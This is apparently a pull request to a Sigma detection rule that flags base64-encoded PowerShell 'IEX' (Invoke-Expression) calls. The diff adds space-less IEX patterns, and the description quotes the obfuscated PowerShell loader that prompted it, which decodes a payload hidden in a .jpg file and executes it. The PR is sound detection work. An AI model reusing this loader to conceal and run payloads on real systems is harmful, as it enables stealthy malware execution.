### PR TITLE
added other potential IEX strings

### DIFF
--- a/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects usage of a base64 encoded "IEX" string in a process command line
 author: Florian Roth (Nextron Systems)
 date: 2019/08/23
-modified: 2023/01/30
+modified: 2023/02/18
 tags:
     - attack.execution
     - attack.t1059.001
@@ -18,6 +18,12 @@ detection:
             - 'iex (['
             - 'iex (New'
             - 'IEX (New'
+            - 'IEX(['
+            - 'iex(['
+            - 'iex(New'
+            - 'IEX(New'
+            - "IEX(('"
+            - "iex(('"
         # UTF16 LE
         - CommandLine|contains:
             - 'SQBFAFgAIAAoAFsA'


### PR DESCRIPTION
Added IEX strings without spaces as I saw it was not detecting this (originally base64 encoded):
`$XX=IEX(('[' + [char]0x53 + 'ystem.Text.Enc' + [char]0x6f + 'ding]::A' + [char]0x53 + 'CII.Get' + [char]0x53 + 'tring([' + [char]0x53 + 'ystem.C' + [char]0x6f + 'nvert]::Fr' + [char]0x6f + 'mBase6' + [char]0x34 + '' + [char]0x53 + 'tring((get-c' + [char]0x6f + 'ntent -path ''c:\wind' + [char]0x6f + 'ws\temp\picture.jpg'')))'));$BB=IEX(('start-sleep 10;$s=$XX;$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-' + [char]0x34 + '0);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);IEX([' + [char]0x53 + 'tring]::J' + [char]0x6f + 'in('''',$d));;'));IEX($BB)`